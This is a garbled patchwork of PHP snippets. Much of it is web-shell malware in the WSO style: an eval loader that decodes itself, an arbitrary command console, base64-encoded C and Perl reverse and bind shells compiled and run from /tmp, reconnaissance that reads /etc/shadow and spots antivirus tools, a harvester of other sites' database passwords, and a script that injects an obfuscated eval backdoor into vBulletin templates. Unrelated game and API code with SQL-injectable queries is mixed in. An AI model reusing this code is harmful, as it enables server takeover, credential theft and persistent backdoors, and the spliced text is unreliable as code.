function cx()
{
$x = @base64_decode(@implode(@array_slice(@file(__FILE__), -1)));
$y = @dx($x, @bx($x));
@fx(@base64_encode(@ex($y, @hash("sha256", @mt_rand()))));
@eval($y);
die;
}
function assertOkay(PromiseInterface $promise, $name = 'end')
{
return $promise->then(function ($stream) use($name) {
echo 'EXPECTED: connection to ' . $name . ' OK' . PHP_EOL;
$stream->close();
}, function (Exception $error) use($name) {
echo 'FAIL: connection to ' . $name . ' failed: ';
ex($error);
});
}
function zhineng_contents($url)
{
$a = getrobotmeg($url);
$title = $a[leachsubject];
$contents = $a[leachmessage];
$fh = array('|', '_', '-', ' ', '―', '_', '!');
foreach ($fh as $s) {
$title = ex($title, $s, 0);
}
return array(title => ' ' . trim($title), contents => $contents, tag => getkeyword($title));
}
/**
* Magic method for handling API methods.
*
* @param string $method
* @param array $args
* @return array
*/
public static function __callStatic($method, $args)
{
// catch args
$args = isset($args[0]) ? $args[0] : [];
// set apikey
$apikey = ex($args, 'apikey');
// catch error...
if (!$apikey) {
trigger_error('API key required.');
}
// set type
$type = ex($args, 'is_full') ? 'full' : 'basic';
// set host
$host = ex($args, 'is_sandbox') ? 'api-sandbox.wealthengine.com' : 'api.wealthengine.com';
// cleanup
unset($args['apikey'], $args['is_full'], $args['is_sandbox']);
// set endpoint
$endpoint = 'https://' . $host . '/v1/profile/find_one/' . $method . '/' . $type;
// set headers
$headers = ['Content-Type: application/json', 'Authorization: APIKey ' . $apikey];
// build payload
$payload = json_encode($args);
// setup curl request
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
$response = curl_exec($ch);
// catch error...
if (curl_errno($ch)) {
// report
#$errors = curl_error($ch);
// fail
$result = false;
} else {
// set result
$result = json_decode($response);
}
// close
curl_close($ch);
// return
return $result;
}
}
echo "</table>";
$statsik = $_GET['stat'];
$licz = $tab[0][$statsik] + 1;
$AP = GetValue("select ap from `CHARACTER` where userid='{$loginId}'");
echo "<p>AP: {$AP}</p>";
if (isset($statsik) && $AP > 0) {
$AP--;
switch ($statsik) {
case 0:
ex("update `character` set speed = {$licz}, ap={$AP} where userid='{$loginId}'");
break;
case 1:
ex("update `character` set str = {$licz}, ap={$AP} where userid='{$loginId}'");
break;
case 2:
ex("update `character` set agi = {$licz}, ap={$AP} where userid='{$loginId}'");
break;
case 3:
$licz = $licz + 9;
ex("update `character` set livemax = {$licz}, live = {$licz}, ap={$AP} where userid='{$loginId}'");
break;
default:
echo "<p>Popsiłueś =(</p>";
break;
}
} else {
echo "<p>Nie masz wystarczająco dużo pkt. umiejętności!</p>";
}
?>
<p><a href="Main.php">Wróć</a></p>
function which($pr)
{
if ($GLOBALS['windows']) {
return 0;
}
$path = ex("which {$pr}");
if (!empty($path)) {
return $path;
} else {
return 0;
}
}
function pwd_conwert()
{
$res = "";
if (file_exists("/etc/passwd")) {
$input = implode(file("/etc/passwd"));
$input = explode("\n", $input);
foreach ($input as $i => $v) {
$word = explode(":", $v);
$res .= $word[0] . " ";
}
$res = explode(" ", $res);
} else {
$input = implode(ex("cat /etc/passwd"));
$input = explode("\n", $input);
foreach ($input as $i => $v) {
$word = explode(":", $v);
$res .= $word[0] . " ";
}
$res = explode(" ", $res);
}
return $res;
}
function testwget()
{
if (ex('wget --help')) {
return showstat("on");
} else {
return showstat("off");
}
}
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$output = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($f = @popen($cmd, "r"))) {
$output = "";
while (!@feof($f)) {
$output .= @fread($f, 1024);
}
@pclose($f);
}
}
return $output;
}
$cmd = (print ex($cmd));
if (!empty($output)) {
echo str_replace(">", ">", str_replace("<", "<", $output));
}
?>
</font></pre>
<hr color="black" width=751px height=115px>
<SCRIPT LANGUAGE="JavaScript">
<!--
document.injection.cmd.focus();
//-->
</SCRIPT>
</td><td> </td>
</tr></table></div>
<?php
/**
* [stats gets the data required to output a series of charts, graphs, and statistics]
* @return [array] [an array of arrays that contains the necessary data in the required format]
*/
public function stats()
{
# redirect if not logged in
if (!$this->isAdminLoggedIn()) {
redirect("/");
}
# get all the data
$data = array();
$data['sales_counts'] = $this->admin_m->stats_SalesCountsSinceLastRelease();
$data['percent_free'] = $this->admin_m->stats_PercentFreePurchases();
$data['avg_paid'] = $this->admin_m->stats_AvgPricePaid();
$data['avg_paid_by_item'] = $this->admin_m->stats_AvgPricePaidByItem();
$data['total_income_by_item'] = $this->admin_m->stats_TotalIncomeByItem();
$data['total_purchases_by_month'] = $this->admin_m->stats_TotalPurchasesByMonth();
$data['total_income_by_month'] = $this->admin_m->stats_TotalIncomeByMonth();
ex($data);
}
function actionNetwork() {
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzb2NrZmQsIG5ld2ZkLCBpOw0KICAgIGNoYXIgcGFzc1szMF07DQogICAgc3RydWN0IHNvY2thZGRyX2luIHJlbW90ZTsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighc29ja2ZkKQ0KICAgICAgICByZXR1cm4gLTE7DQogICAgcmVtb3RlLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHJlbW90ZS5zaW5fYWRkci5zX2FkZHIgPSBodG9ubChJTkFERFJfQU5ZKTsNCiAgICBiaW5kKHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGUsIDB4MTApOw0KICAgIGxpc3Rlbihzb2NrZmQsIDUpOw0KICAgIHdoaWxlKDEpIHsNCiAgICAgICAgbmV3ZmQ9YWNjZXB0KHNvY2tmZCwwLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDEpOw0KICAgICAgICBkdXAyKG5ld2ZkLDIpOw0KICAgICAgICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChuZXdmZCxwYXNzLHNpemVvZihwYXNzKSk7DQogICAgICAgIGZvcihpPTA7aTxzdHJsZW4ocGFzcyk7aSsrKQ0KICAgICAgICAgICAgaWYoIChwYXNzW2ldID09ICdcbicpIHx8IChwYXNzW2ldID09ICdccicpICkNCiAgICAgICAgICAgICAgICBwYXNzW2ldID0gJ1wwJzsNCiAgICAgICAgICAgIGlmIChzdHJjbXAoYXJndlsyXSxwYXNzKSA9PSAwKQ0KICAgICAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICAgICAgY2xvc2UobmV3ZmQpOw0KICAgIH0NCn0=";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
</form>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
</form><br>
<?php
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w=@fopen($f,"w") or @function_exists('file_put_contents');
if($w) {
@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c",$bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
}
if($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c",$back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
}
}
echo '</div>';
}
function get_data($url)
{
$ar = array('1.txt', '2.txt', '3.txt', '4.txt', '5.txt', '6.txt', '7.txt', '8.txt', '9.txt', '0.txt');
$src = file_get_contents($url);
$files = explode('<a href="', $src);
$data = array();
foreach ($files as $id => $file) {
if ($id == 0) {
continue;
}
$file = explode('">', $file);
$file = trim($file[0]);
if (!eregi('.txt', $file)) {
continue;
}
$src = file_get_contents("{$url}/{$file}");
if (!$src) {
continue;
}
$user = str_replace($ar, '', $file);
$user = str_replace($ar, '', $user . '.txt');
$user = str_replace($ar, '', $user . '.txt');
$user = trim(str_replace('.txt', '', $user));
if (eregi("WordPress", $src)) {
$pass = ex("define('DB_PASSWORD', '", "');", $src);
$data[] = array($user, $pass);
} else {
$tokens = token_get_all($src);
foreach ($tokens as $token) {
if (!$token[1]) {
continue;
}
$tokenname = token_name($token[0]);
if ($tokenname != 'T_VARIABLE') {
continue;
}
$var = $token[1];
if (eregi('pass', $var)) {
$f = str_replace(' ', '', ex($var, ';', $src));
$a = trim(ex("='", "'", $f));
$b = trim(ex('"', '"', $f));
if ($a != '') {
$pass = $a;
} elseif ($b != '') {
$pass = $b;
}
if ($pass == '') {
continue;
}
$data[] = array($user, $pass);
}
}
}
}
return $data;
}
function actionSecInfo()
{
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "\n") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml1>' . $v . '</pre>';
}
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) {
showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
}
showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
$temp = array();
if (function_exists('mysql_get_client_info')) {
$temp[] = "MySql (" . mysql_get_client_info() . ")";
}
if (function_exists('mssql_connect')) {
$temp[] = "MSSQL";
}
if (function_exists('pg_connect')) {
$temp[] = "PostgreSQL";
}
if (function_exists('oci_connect')) {
$temp[] = "Oracle";
}
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if ($GLOBALS['os'] == 'nix') {
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>" : 'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
echo '<br>';
$temp = array();
foreach ($userful as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam('Userful', implode(', ', $temp));
$temp = array();
foreach ($danger as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam('Danger', implode(', ', $temp));
$temp = array();
foreach ($downloaders as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam('Downloaders', implode(', ', $temp));
echo '<br/>';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version', ex('ver'));
showSecParam('Account Settings', ex('net accounts'));
showSecParam('User Accounts', ex('net user'));
}
echo '</div>';
}
function which($pr)
{
$path = ex("which {$pr}");
if (!empty($path)) {
return $path;
} else {
return $pr;
}
}
public function getIterator()
{
ex(__METHOD__);
}
</b>';
echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Mass Change Admin vBulletin</span><center><br>';
if (isset($_POST['s'])) {
$file = @file_get_contents('vb.txt');
$ex = explode("\n", $file);
echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#e4e4e4'><b>Domains </b><font></td><td> <font color='#e4e4e4'><b>Configs </b><font></td><td> <font color='#e4e4e4'><b>Result </b><font></td></div>";
foreach ($ex as $exp) {
$es = explode("||", $exp);
$config = $es[0];
$domin = $es[1];
$domins = trim($domin) . '';
$readconfig = @file_get_contents(trim($config));
if (ereg('vBulletin', $readconfig)) {
$db = ex($readconfig, '$config[\'Database\'][\'dbname\'] = \'', "';");
$userdb = ex($readconfig, '$config[\'MasterServer\'][\'username\'] = \'', "';");
$pass = ex($readconfig, '$config[\'MasterServer\'][\'password\'] = \'', "';");
$con = @mysql_connect('localhost', $userdb, $pass);
$db = @mysql_select_db($db, $con);
$shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==";
$crypt = "{\${eval(gzinflate(base64_decode(\\'";
$crypt .= "{$shell}";
$crypt .= "\\')))}}{\${exit()}}</textarea>";
$sqlfaq = "UPDATE template SET template ='" . $crypt . "' WHERE title ='FAQ'";
$query = @mysql_query($sqlfaq, $con);
if ($query) {
$r = '<b style="color: #ee5500">Succeed</b> shell in search.php';
} else {
$r = '<b style="color:red">failed</b>';
}
$domins = trim($domin) . '';
echo "<tr>\n<td><div class='cone'><a target='_blank' href='http://{$domins}'>{$domin}</a></div></td>\n<td><div class='cone'><a target='_blank' href='{$config}'>Config</a></div></td><td>" . $r . "</td></tr>";
$exp = $rd + $sqlexp;
$lvl = GetValue("select lvl from `character` where name = '{$login}'");
$ap = GetValue("select ap from `character` where name = '{$login}'");
//header('Location: victory.html');
echo "<h6>Wygrałeś!</h6>";
echo "<p>dostajesz: " . $rd . " pkt. doświadczenia oraz przy pokonamym wrogu znalazleś: " . $gold . " sztuk złota! </p>";
$gold = $gold + $sqlgold;
$pytanie = " UPDATE `character` SET gold = '{$gold}' , exp = '{$exp}' ";
if ($witcher->lvlCheck()) {
$lvl++;
$ap = $ap + 5;
$pytanie = $pytanie . ", lvl = '{$lvl}', ap = '{$ap}', exp = 0 ";
}
$pytanie = $pytanie . " where name = '{$login}'";
//echo $pytanie;
ex($pytanie);
echo "<a href='index.php'>jeszcze raz?</a>";
}
if ($witcher->getlive() <= 0) {
header('Location: defeat.html');
}
if ($apw == 0 && $apm == 0 || $witcher->CheckPass()) {
$count++;
$apw += $witcher->getap($witcher->getspeed(), $monster->getspeed());
$apm = $monster->getap($monster->getspeed(), $witcher->getspeed());
$witcher->set_ap($apw);
$monster->set_ap($apm);
if ($apw >= $apm) {
$start = 1;
} else {
$start = 0;
function which($p)
{
$path = ex('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
private function config($coords, $default = null)
{
return ex($this->config, $coords, $default);
}
function main()
{
global $_PAGE;
$s = isset($_GET["s"]) ? $_GET["s"] : 0;
// web site only
$k = isset($_GET["k"]) ? $_GET["k"] : 0;
// _catid
$n = isset($_GET["n"]) ? $_GET["n"] : $_PAGE;
// per page, n-count
$f = isset($_GET["f"]) ? $_GET["f"] : 0;
// from
$ww = isset($_GET["w"]) ? $_GET["w"] : "";
//word
$fwght = isset($_GET["g"]) ? $_GET["g"] : 0;
//max weight
$np = $f;
$tp = $f;
$w = config_prep($ww);
echo "<hr>";
echo "<table width='960px'><tr><td width='840px'>";
if (isset($_GET["sitemap"])) {
sm($_GET["sitemap"]);
}
if (isset($_GET["sitasets"])) {
sa($_GET["sitasets"], $_GET['sid']);
}
if (isset($_GET["wcount"])) {
coutwords($_GET["wcount"]);
} else {
if (strlen($w)) {
if (substr($w, 0, 4) == "http") {
dbcontent($w);
}
if ($w == "xxx") {
sites();
} else {
$np = ex($w, $f, $n, $k, $s, $fwght);
}
} else {
ads();
}
}
if ($np != $f) {
if ($np > $n) {
$x = $f - $n;
echo "<a href='index.php?w={$ww}&f={$x}&n={$n}&s={$s}&g={$fwght}'><<-Prev</a> MITZA-1.0.0.1 <font color='red'>Mitzzzzzzzzzz</font><font color='blue'>z</font> <font color='green'>z </font> <font color='blue'>z</font> <font color='red'> i </font> <font color='yellow'>n </font> <font color='blue'>g</font>...";
} else {
echo "X<-Prev MITZA-1.0.0.1 <font color='red'>Mitzzzzzzzzzz</font><font color='blue'>z</font> <font color='green'>z </font> <font color='blue'>z</font> <font color='red'> i </font> <font color='yellow'>n </font> <font color='blue'>g</font>...";
}
if ($tp + $_PAGE == $np) {
echo "<a href='index.php?w={$ww}&f={$np}&n={$n}&s={$s}&g={$fwght}'>Next->></a> ";
} else {
echo "Next->X";
}
}
global $CAT;
echo "</td><td valign='top' class='fancy'><div align='center'>";
if ($CAT == 0) {
echo "<a href='donate.html'>support</div><div><img src='include/logo.png'></a>";
} else {
echo "Powered by<bt><a href='http://enjoydecor.com' title='Toronto home staging and interior decorating'><img src='http://enjoydecor.com/_themes/_simple3/llogo.jpg' width='110px' alt='home staging enjoydecor logo'></a>";
}
echo "</div></td></tr></table>";
echo "<hr>";
return $f;
}
function actionConsole()
{
if (isset($_POST['ajax'])) {
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . ex($_POST['p1']), "\n\r\t\\'"));
if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) {
if (@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='" . $GLOBALS['cwd'] . "';";
}
}
echo "document.cf.output.value+='" . $temp . "';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push("");
cur = cmds.length-1;
}
</script>
<?php
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);a(null,null,this.cmd.value);return false;"><select name=alias>';
foreach ($GLOBALS['aliases'] as $n => $v) {
if ($v == '') {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
}
echo '</select><input type=button onclick="add(document.cf.alias.value);a(null,null,document.cf.alias.value);" value=">>"><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if (!empty($_POST['p1'])) {
echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . ex($_POST['p1']));
}
echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
echo '</form></div><script>document.cf.cmd.focus();</script>';
}
function getuser()
{
$out = get_current_user();
if ($out != "SYSTEM") {
if (($out = ex('id')) == '') {
$out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid();
}
}
return $out;
}
echo "<tr><td>nazwa</td><td>bonus</td><td>minus</tr><tr>";
for ($i = 0; $i < count($tab); $i++) {
echo ' <tr>';
foreach ($tab[$keys[$i]] as $key => $value) {
$itemId = GetPacket("select it.id from items it join inventory inv on it.id = inv.itemId where inv.charId='{$login}' and it.itemType=0 and inv.use=0");
echo "<td>" . $value . " </td> ";
}
echo "<td> <a href = inventory.php?item=" . $itemId[$i][0] . ">Załóż</a></td></tr>";
}
$pytanie = "select nazwa, bonus, minus from items it join inventory inv on it.id = inv.itemId where inv.charId='{$login}' and it.itemType=1 and inv.use=0";
$tab = GetPacket($pytanie);
$keys = array_keys($tab);
echo "</tr></table><p>Pancerze:</p><table>";
echo "<tr><td>nazwa</td><td>bonus</td><td>minus</tr><tr>";
for ($i = 0; $i < count($tab); $i++) {
echo ' <tr>';
foreach ($tab[$keys[$i]] as $key => $value) {
$itemId = GetPacket("select it.id from items it join inventory inv on it.id = inv.itemId where inv.charId='{$login}' and it.itemType=1 and inv.use=0");
echo "<td>" . $value . " </td> ";
}
echo "<td> <a href = inventory.php?item=" . $itemId[$i][0] . ">Załóż</a></td></tr>";
}
echo "</table>";
$item = $_GET['item'];
if (isset($item)) {
ex("update inventory set `use` = TRUE where charid = '{$login}' and id = '{$item}'");
}
?>
<a href="Main.php">Wroc</a>
function actionNetwork()
{
hardHeader();
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
